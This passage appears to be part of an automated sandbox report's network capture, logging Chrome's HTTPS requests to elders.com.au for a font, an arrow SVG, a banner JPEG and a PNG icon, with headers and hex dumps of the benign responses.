                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 5f 80 5f ae 5f e0 5f f6 60 28 60 3c 60 72 60 9c 60 ae 60 da 61 30 61 48 61 60 61 80 61 9a 61 b8 61 e0 62 0e 62 34 62 60 62 9a 62 e0 63 18 63 66 63 a4 63 bc 63 ea 64 1e 64 36 64 60 64 82 64 ca 64 fa 65 2c 65 82 65 ac 65 ec 66 02 66 32 66 60 66 9c 66 d2 67 00 67 26 67 38 67 4a 67 64 67 7c 68 1a 68 a8 68 fe 69 4a 69 a8 69 fe 6a 1a 6a 34 6a 52 6a 72 6a 96 6a be 6a de 6a fc 6b 22 6b 46 6b 6e 6b 96 6b b6 6b e0 6b ec 6b fe 6c 30 6c 62 6c 8a 6c b2 6c ee 6d 24 6d 5e 6d 90 6d d2 6e 0c 6e 4e 6e 88 6e e0 6f 30 6f 56 6f 7c 6f f2 70 18 70 4a 70 4a 70 4a 70 4a 70 58 70 66 70 74 70 94 70 b4 70 d4 71 0c 71 44 71 7c 71 92 71 b0 71 c2 71 f4 72 5a 72 6c 72 7c 72 8c 72 be 72 e8 73 18 73 4e 73 6e 73 b4 73 ee 74 16 74 46 74 5e 74 8e 74 c8 74 f2 75 20 75 56 75 74 75 ba 75 f4 76
                                                                                                                                                                                                            Data Ascii: ____`(`<`r```a0aHa`aaaabb4b`bbccfcccdd6d`ddde,eeeff2f`ffgg&g8gJgdg|hhhiJiijj4jRjrjjjjk"kFknkkkkkl0lblllm$m^mmnnNnno0oVo|oppJpJpJpJpXpfptpppqqDq|qqqqrZrlr|rrrssNsnssttFt^tttu uVutuuv
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 38 e3 5a e3 7c e3 92 e3 a0 e3 b6 00 00 00 02 00 4c 00 00 01 e0 02 ae 00 03 00 07 00 00 33 11 21 11 25 21 11 21 4c 01 94 fe 9e 01 30 fe d0 02 ae fd 52 32 02 4a 00 02 00 55 ff f9 00 cf 02 bb 00 03 00 0e 00 00 13 03 23 03 13 14 06 22 26 35 34 36 33 32 16 c2 13 3c 13 6f 24 32 24 23 1a 19 24 02 bb fe 0b 01 e8 fd 8a 1a 25 24 1a 19 24 23 00 00 00 02 00 5f 01 d4 01 3a 02 c4 00 03 00 07 00 00 01 23 35 33 07 23 35 33 01 3a 48 48 93 48 48 01 d4 f0 f0 f0 00 02 00 23 00 00 02 13 02 c4 00 1b 00 1f 00 00 01 23 07 33 15 23 07 23 37 23 07 23 37 23 35 33 37 23 35 33 37 33 07 33 37 33 07 33 07 23 07 33 02 13 6b 15 62 6c 1e 43 1e 7e 1e 43 1e 62 6c 14 62 6c 1e 43 1e 7e 1e 43 1e 62 ae 7e 15 7e 01 af 98 42 d5 d5 d5 d5 42 98 42 d3 d3 d3 d3 42 98 00 00 03 00 37 ff 95 02 0c 03 0f
                                                                                                                                                                                                            Data Ascii: 8Z|L3!%!!L0R2JU#"&54632<o$2$#$%$$#_:#53#53:HHHH##3##7##7#537#53733733#3kblC~CblblC~Cb~~BBBB7
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 36 33 32 16 15 14 06 07 16 01 cd 40 31 5c 87 25 0c 12 0c 32 81 80 2c 29 53 2e 5a 14 59 42 35 4a 55 23 65 6b 53 6b 41 38 40 69 6c 60 1d 36 03 35 03 72 49 3c 20 1e 38 03 0d 5a 31 3b 3b 29 53 5b 48 35 4f 10 0f 00 00 00 00 01 00 2d ff 39 01 f4 02 00 00 2a 00 00 21 23 22 26 23 15 16 1d 01 07 35 34 36 35 22 06 23 21 35 13 33 03 0e 02 07 36 3b 01 35 34 3f 02 15 14 06 14 15 32 36 3b 01 01 f4 37 06 14 01 01 4d 01 02 1f 07 fe fe e6 57 bf 07 13 11 01 0c 1b b1 04 0a 3e 01 01 18 08 31 01 0b 0b 07 94 17 a0 06 20 02 01 3e 01 c2 fe 8a 0e 22 1e 01 03 1d 22 38 8c 13 c9 14 25 14 01 02 00 00 01 00 3c ff 47 01 b5 01 f2 00 19 00 00 25 14 06 23 22 2f 01 16 33 32 36 35 34 26 23 22 07 13 21 07 23 07 36 33 32 16 01 b5 a9 78 25 25 0e 21 2a 5b 7d 4f 46 4e 31 20 01 28 0c d5 11 23 21
                                                                                                                                                                                                            Data Ascii: 632@1\%2,)S.ZYB5JU#ekSkA8@il`65rI< 8Z1;;)S[H5O-9*!#"&#5465"#!536;54?26;7MW>1 >""8%<G%#"/32654&#"!#632x%%!*[}OFN1 (#!
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 01 11 33 32 16 17 1e 01 15 14 06 07 16 17 16 07 34 26 27 26 2b 01 11 33 32 36 03 34 26 27 26 2b 01 15 33 32 36 37 36 02 20 39 32 1e 3f 48 b1 63 64 4d 1b 35 40 40 3b 3a 20 3e 56 2e 25 21 2f 79 92 49 41 22 2b 23 17 34 61 77 37 32 0f 0b bc 39 5c 13 0b 09 02 ae 06 09 12 57 34 35 4e 13 0b 19 2f 56 2d 45 07 07 ff 00 40 01 74 28 3b 09 06 e2 18 23 19 00 01 00 41 ff f5 02 1a 02 b7 00 19 00 00 25 06 23 22 27 26 35 34 36 33 32 17 07 26 23 22 07 06 15 14 17 1e 01 33 32 37 02 1a 56 69 78 50 52 a4 7c 64 49 2c 3b 47 76 33 1d 16 1a 62 3c 48 3e 2d 38 5b 5d a8 99 c9 38 35 2b 76 43 73 5a 37 3f 41 2c 00 00 00 00 02 00 5f 00 00 02 38 02 ae 00 0c 00 1a 00 00 01 14 07 0e 01 2b 01 11 33 32 16 17 16 07 34 26 27 2e 01 2b 01 11 33 32 36 37 36 02 38 4e 2c 61 4b b3 89 55 57 30 74 59
                                                                                                                                                                                                            Data Ascii: 324&'&+3264&'&+32676 92?HcdM5@@;: >V.%!/yIA"+#4aw729\W45N/V-E@t(;#A%#"'&54632&#"327VixPR|dI,;Gv3b<H>-8[]85+vCsZ7?A,_8+324&'.+326768N,aKUW0tY


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            88192.168.2.457755162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC773OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-down-arrow.svg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            Origin: https://elders.com.au
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.css
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC586INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:50 GMT
                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"d3-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 77838
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210087-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730260786.923085,VS0,VS0,VE672
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b027ed5b2e67-DFW
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC217INData Raw: 64 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 63 6c 61 73 73 3d 22 68 2d 36 20 77 2d 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 73 74 72 6f 6b 65 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 3e 0a 20 20 3c 70 61 74 68 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 64 3d 22 4d 31 39 20 39 6c 2d 37 20 37 2d 37 2d 37 22 20 2f 3e 0a 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: d3<svg xmlns="http://www.w3.org/2000/svg" class="h-6 w-6" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2"> <path stroke-linecap="round" stroke-linejoin="round" d="M19 9l-7 7-7-7" /></svg>
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            89192.168.2.457754162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC644OUTGET /content/dam/eld/images/homepage-banners/rpu_q2_2024_landingpagebanner.jpg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC757INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:51 GMT
                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                            Content-Length: 93735
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=86400, immutable
                                                                                                                                                                                                            Cf-Bgj: h2pri
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            content-disposition: attachment; filename="rpu_q2_2024_landingpagebanner.jpg"; filename*=UTF-8''rpu_q2_2024_landingpagebanner.jpg
                                                                                                                                                                                                            etag: "0x8DCF3252165C79D"
                                                                                                                                                                                                            last-modified: Wed, 23 Oct 2024 05:39:57 GMT
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            x-served-by: cache-pao-kpao1770030-PAO
                                                                                                                                                                                                            x-timer: S1729727994.150794,VS0,VS0,VE1143
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b027f80746e0-DFW
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC612INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 01 90 02 58 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                                                                                            Data Ascii: JFIF``CCX"}!1AQa"q2
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1369INData Raw: 0c 03 01 00 02 11 03 11 00 3f 00 fd 53 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a
                                                                                                                                                                                                            Data Ascii: ?S((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1369INData Raw: 3f f8 9a f9 31 66 2d d2 b5 ac f5 27 da aa 57 24 77 34 a5 49 74 63 8d 56 df bc 8f a8 07 c4 2f 0f 9e 9a 86 40 f4 86 4f fe 26 a7 1e 36 d1 4b 60 5e e4 fb 44 e7 ff 00 65 af 9c 15 fc e5 46 f3 5a 35 04 36 d0 70 32 2b a6 d3 bc 4f 15 9c de 64 87 71 7e aa b8 c7 d6 b8 aa 73 c7 e0 d4 ed a6 a1 2f 8b 43 db 63 f1 76 93 34 81 12 e5 99 cf 45 10 c9 ff 00 c4 d3 e6 f1 46 9b 6f 8f 32 67 5c f4 cc 32 73 ff 00 8e d7 82 dc 78 aa 48 75 07 9e de 72 4e e2 46 7b 57 5d a5 f8 ea 4b bd 36 30 d2 07 74 e5 dd 80 27 71 ec 3f 0a c6 53 ab 05 76 8d 14 21 27 68 9e 92 3c 5d a5 16 0b f6 96 0c 7b 18 64 1f fb 2d 5e 87 54 b6 b8 5c c7 21 23 dd 18 7f 31 5e 55 ff 00 09 67 96 c1 80 52 dd 37 30 19 c5 69 27 8e 25 68 86 3c b5 e3 19 db 51 1c 43 fb 48 b9 50 fe 53 d1 fe d9 08 19 2f 81 ee 0d 54 7f 10 e9 f1 b1
                                                                                                                                                                                                            Data Ascii: ?1f-'W$w4ItcV/@O&6K`^DeFZ56p2+Odq~s/Ccv4EFo2g\2sxHurNF{W]K60t'q?Sv!'h<]{d-^T\!#1^UgR70i'%h<QCHPS/T
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1369INData Raw: f3 c2 da 85 ac 22 13 11 73 26 e6 e4 82 0f 43 c5 5e 8f 4c 8e cd e3 30 c8 e8 37 02 ca 79 0c 71 fa 56 91 9c db d5 68 67 28 c5 2f 33 a4 fe d0 83 24 6f ff 00 c7 4f f8 51 59 54 57 49 9d 8d ea 28 a2 82 42 be 2d f8 c9 e3 99 bc 71 e3 6b d9 92 5d da 7d ab 1b 6b 44 07 e5 d8 a7 05 be ac 72 7e 98 1d ab eb bf 17 5e 3e 9b e1 3d 6a ee 26 db 24 16 53 4a ad e8 56 36 20 fe 95 f0 af f6 4b b0 f9 65 5c d6 f4 ad bb 30 ab 77 a2 2b ac a7 b9 a9 16 ec ad 29 d1 66 ef 22 d4 8b a3 7a c9 9a ea e6 47 37 23 05 d4 8a f7 a9 17 50 e7 ef 52 ae 8b 1f 77 34 d9 34 d8 93 a4 86 8e 64 1c 8c b5 0e a0 bc 64 d5 9f b6 c2 df c4 07 e3 59 5f 61 8d 7a 48 68 5b 78 d4 f0 f9 fa d2 d0 35 46 d2 de 26 46 d6 ce 3b ad 5d 86 ed 76 82 cd f8 56 14 4a 37 05 03 1e c0 54 fe 67 ef 02 74 ed 4a c8 d1 36 6c b5 d4 72 36 37
                                                                                                                                                                                                            Data Ascii: "s&C^L07yqVhg(/3$oOQYTWI(B-qk]}kDr~^>=j&$SJV6 Ke\0w+)f"zG7#PRw44ddY_azHh[x5F&F;]vVJ7TgtJ6lr67
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1369INData Raw: 05 91 10 e0 2f 99 83 8f c6 af 2b 36 d0 4a e0 e3 a6 7a 57 5c 36 39 e5 b8 ea 2a 1b 86 9b ca 3f 67 0a 65 ed e6 74 ac 69 6e b5 f0 38 b4 8c 77 f9 30 7f 0a a7 2e 51 25 73 79 51 63 5c 2a 85 1e c2 96 a8 e9 b7 97 37 11 e2 e6 d9 a1 7f ef 63 00 d5 dd d4 45 a6 b4 16 c2 d1 49 9a 33 54 00 ca 19 48 23 20 f5 06 92 38 d2 25 c2 28 41 fe cd 2e ea 5c d1 e6 01 45 14 50 01 45 14 50 01 45 14 50 01 47 bf 7a 28 a0 02 8a 28 a0 02 97 34 94 50 03 12 14 8d 99 95 15 59 8e 58 81 c9 a7 d1 9a 4d d4 00 b4 51 f8 d1 40 1b d4 51 45 04 18 3e 3d 05 bc 0b e2 20 06 49 d3 6e 46 07 fd 72 6a f8 de 3b 29 3f e7 93 7e 46 be ce f1 93 6d f0 86 b8 7d 2c 67 3f f9 0d ab e6 9b 1b c2 f8 52 03 0f a5 3e 67 15 74 8a 8c 14 dd 9b 38 f5 d3 d9 97 95 6f ca a5 5d 34 37 a8 af 50 b0 d1 e0 ba 64 25 23 e7 a8 c5 6d 37 c3
                                                                                                                                                                                                            Data Ascii: /+6JzW\69*?getin8w0.Q%syQc\*7cEI3TH# 8%(A.\EPEPEPGz((4PYXMQ@QE>= InFrj;)?~Fm},g?R>gt8o]47Pd%#m7
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1369INData Raw: 00 67 48 21 88 07 ff 00 59 ff 00 2c d9 88 55 1c f2 4f 4a fd 65 f3 bc d6 66 3d cd 76 60 e1 19 73 36 b4 fe ae 79 b8 fe 6a 73 8a be bf a7 43 35 3c 23 a4 2c 0f 09 b3 8d e3 73 93 b8 7f 2a cb be f8 5d e1 9b d9 0c 8d 65 e4 67 af 96 f8 5f ca ba 90 d4 1c 30 20 8c 83 d8 d7 a2 a9 c2 3f 0a b1 e5 73 c9 ee cf 3c 97 e0 a6 88 f2 e6 da f6 48 c6 79 8d 80 6f eb 52 c3 f0 66 c2 10 0a de 30 6e ff 00 27 1f ce bb af b3 c0 30 44 51 82 39 1f 2d 4a 5a 9f 2d fe 27 f8 b0 e6 b6 df 92 38 c8 7e 15 e9 f1 cc b2 1b 86 38 1f dd ef 5a 36 fe 07 82 dd 70 2e 9d b2 72 58 f0 7e 82 b8 9f da 1b e3 f5 87 c0 3f 0c 59 df 4d 67 fd a7 aa ea 32 bc 56 56 6c fb 13 08 01 79 5c f5 da b9 51 81 c9 24 0e 2a 8f c0 4f 8f 29 f1 3b c3 cd 3e ad 25 bd b5 f2 48 63 61 1f 19 6e a4 63 b2 e3 a1 e9 d4 67 8a e0 ab 57 0f 4e
                                                                                                                                                                                                            Data Ascii: gH!Y,UOJef=v`s6yjsC5<#,s*]eg_0 ?s<HyoRf0n'0DQ9-JZ-'8~8Z6p.rX~?YMg2VVly\Q$*O);>%HcancgWN
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1369INData Raw: e1 ff 00 0a f8 5b c4 da ad f4 1a 4d c3 45 ad a5 8d e2 ff 00 62 dc ee c8 31 b2 0e 67 99 3f bd 9d 8b d3 0c dd 3e 1f f1 71 92 5b ad 8e d8 94 3b 23 ee ee 14 e1 4f fd f3 8a aa b3 2a dc 43 1a 80 b1 a1 da aa bc 01 d8 63 f3 ab 5e 2e 9b cc f1 15 cf 18 01 53 1d f9 2a 09 3f 9d 79 9a ca a7 3b dc fa 47 42 30 8c 69 47 63 1a 1b 57 3b 57 7a 28 ed f2 d7 55 a1 58 dc 2c e8 e6 f6 de 36 fb b1 c9 2a 30 03 fd 96 2b 93 b4 9c 76 e3 ad 72 e6 62 14 9c f4 e9 56 ec f5 26 db e4 0f 94 13 bb 76 7d b9 a2 a2 94 91 e8 61 9d 1a 72 b4 95 fe 6c fd 7d fd 89 fe 1e e9 5e 09 f8 43 36 a7 a5 eb 30 f8 81 fc 45 76 2e e5 bf 87 82 8a 88 02 5b 48 a1 99 55 e2 63 20 3b 78 6c 86 ef 5f 41 29 af cb 6f d8 17 e2 b5 ff 00 81 fe 33 69 da 07 da 9b fb 03 c4 b2 0b 1b cb 57 6f 93 cd 2a 7c 99 80 e8 1c 30 db 9e e1 88
                                                                                                                                                                                                            Data Ascii: [MEb1g?>q[;#O*Cc^.S*?y;GB0iGcW;Wz(UX,6*0+vrbV&v}arl}^C60Ev.[HUc ;xl_A)o3iWo*|0
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1369INData Raw: 6c e3 1b 25 76 63 79 7a bb 90 22 86 52 c7 81 f2 e4 d5 5d 49 75 8b 49 14 de 79 d1 e3 e5 1b fa 7d 2b ab fe dc d6 63 55 db 6d 3a 10 3f 78 c1 08 f3 3d 09 e3 8c 7b 56 75 dd e5 e5 f6 56 e6 de 49 b1 c1 57 8d 8f ff 00 aa b4 85 49 27 ac 51 12 82 6b 76 72 bb c3 48 0c 9b 48 f5 02 9e ac 8a 7e 42 0d 6d 9b 3b 5e 37 58 48 be bd 46 7f 4a 9f 6e 94 9c 2e 96 c7 d7 cc 95 89 fc 30 2b a1 e2 17 f2 bf c0 c5 51 7d ff 00 33 9e 69 24 6e 00 e2 93 74 9c 67 35 b9 24 7a 73 0c 0b 42 9f f6 d4 d4 96 c3 4b 8b fd 65 9b ca 7b 7e fc 8f e9 47 d6 34 f8 43 d8 eb b9 83 b9 f3 8c 1a 5d cf dc e2 ba 91 a8 5a 2a 85 8e c6 38 47 e0 c7 f3 35 22 de 5a 6c da 6d 23 93 dd d5 4f f4 ac be b1 2f e4 34 f6 2b f9 8e 50 37 bd 38 49 cf 5a e9 bc eb 2c e7 ec 63 ea 31 fe 15 24 73 59 46 a7 64 41 4b 75 c2 2e 69 7d 61 ff
                                                                                                                                                                                                            Data Ascii: l%vcyz"R]IuIy}+cUm:?x={VuVIWI'QkvrHH~Bm;^7XHFJn.0+Q}3i$ntg5$zsBKe{~G4C]Z*8G5"Zlm#O/4+P78IZ,c1$sYFdAKu.i}a
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1369INData Raw: 53 9e 43 64 74 ae 93 4f b3 9e 35 65 9c e1 08 c6 cc f5 a9 af 0c d0 ac 62 08 84 ab d0 86 1b 88 fc e8 f6 72 6b 99 b0 f6 8a f6 48 c6 b6 f1 43 c7 1e d9 21 13 38 e8 f9 c1 3f 5a b2 be 26 2c 06 6d 80 fa 36 6b 49 6c e0 91 77 4b 6f 11 72 3e 6f 94 56 3d d6 e8 59 91 2c 8f 96 09 01 8a 93 55 2f 69 04 b5 12 e4 93 d8 b6 9e 23 8d 9b 06 06 03 d7 70 a9 17 5f 87 6f fa a7 dd e9 91 8a c5 67 19 e6 dc c7 ea 70 6a 41 24 27 f8 71 ed 51 ed a7 dc bf 67 1e c6 a4 da d2 49 1b 2a c6 41 23 ab 1e 94 5a eb 11 ac 61 1a 36 ca 8e 58 11 cd 53 91 6c 7e ce a0 39 32 b7 3c 37 4a a5 26 d5 e1 7f 9d 0e ac 93 bd c1 42 2f 4b 1b bf db 96 fd 0a bf e1 8a 46 d7 ed a3 ea b2 7e 42 b9 d4 ff 00 81 1a 56 d3 ef 25 f9 96 d6 72 3b 7c b5 3f 58 a8 f6 1f b2 87 53 72 4d 6a c6 e5 76 ca 92 7d 31 4d 17 7a 53 63 fd 1f 3f
                                                                                                                                                                                                            Data Ascii: SCdtO5ebrkHC!8?Z&,m6kIlwKor>oV=Y,U/i#p_ogpjA$'qQgI*A#Za6XSl~92<7J&B/KF~BV%r;|?XSrMjv}1MzSc?
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1369INData Raw: 2f 6a 54 0c fe ee e4 ff 00 51 59 ba d4 23 bc e3 ff 00 81 c4 b5 77 b5 fe e6 7a 95 af 85 ac 2d 58 3c 8a 66 38 e5 64 20 8a 4b cd 0f 4f 8d 59 97 4f 66 18 cf ee 5c 83 ff 00 d6 af 36 4f 8a 7a 23 72 d2 ed 3d 3e 59 95 b9 ac cd 7f e3 c7 87 fc 23 62 9a 95 fd dc b0 d9 34 ab 0f 9d 6e af 39 46 73 84 dc 14 70 18 e1 41 3c 64 81 91 9a 16 2a 83 f7 54 a3 ff 00 81 45 94 a1 26 fa fd cc f4 8c 68 d1 b0 12 59 dc 21 f4 67 38 a8 2f 17 48 92 3f f4 78 6e 23 7c f5 dc 31 fa d7 1f a5 fc 6b d2 3c 45 0c be 4d e4 c6 28 65 6b 77 37 80 41 fb d5 c6 f8 c0 90 02 59 09 01 80 c8 19 1c f3 57 e4 f1 a6 9d 71 f2 c7 6d 18 95 54 b1 54 94 06 20 0e 4e de b8 fa 0a 3d a4 5e 9c cb ef 57 34 71 71 7e f2 7f 89 bd a6 db da ad f4 52 99 65 8c c7 fb c1 c0 3f 32 8c 8f d4 57 e0 de a9 78 75 3d 6b 50 b9 92 53 24 d7
                                                                                                                                                                                                            Data Ascii: /jTQY#wz-X<f8d KOYOf\6Oz#r=>Y#b4n9FspA<d*TE&hY!g8/H?xn#|1k<EM(ekw7AYWqmTT N=^W4qq~Re?2Wxu=kPS$


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            90192.168.2.457757162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC622OUTGET /content/dam/eld/icons---logos/icons/find-expert.png HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC696INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:51 GMT
                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                            Content-Length: 555
                                                                                                                                                                                                            Connection: close
